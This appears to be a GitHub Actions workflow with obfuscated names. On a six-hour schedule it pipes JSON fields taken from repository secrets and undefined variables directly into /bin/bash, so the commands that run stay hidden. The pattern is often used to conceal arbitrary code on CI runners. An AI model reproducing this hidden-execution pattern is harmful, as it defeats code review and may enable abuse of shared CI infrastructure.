name: leebangxxk

on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: leebangxxk
        env:
          szk6982: ${{ secrets.szk6982 }}
        run: |
          echo $szk6982 | jq -r .v8850 | /bin/bash
          echo $ffj69318 | jq -r .add05 | /bin/bash
          echo $ofdu26968 | jq -r .p06 | /bin/bash
          echo $j8085 | jq -r .v2 | /bin/bash
          echo $dyz13 | jq -r .mtak633 | /bin/bash
          echo $fko69367 | jq -r .my4475 | /bin/bash
          echo $bea0652 | jq -r .q3590 | /bin/bash

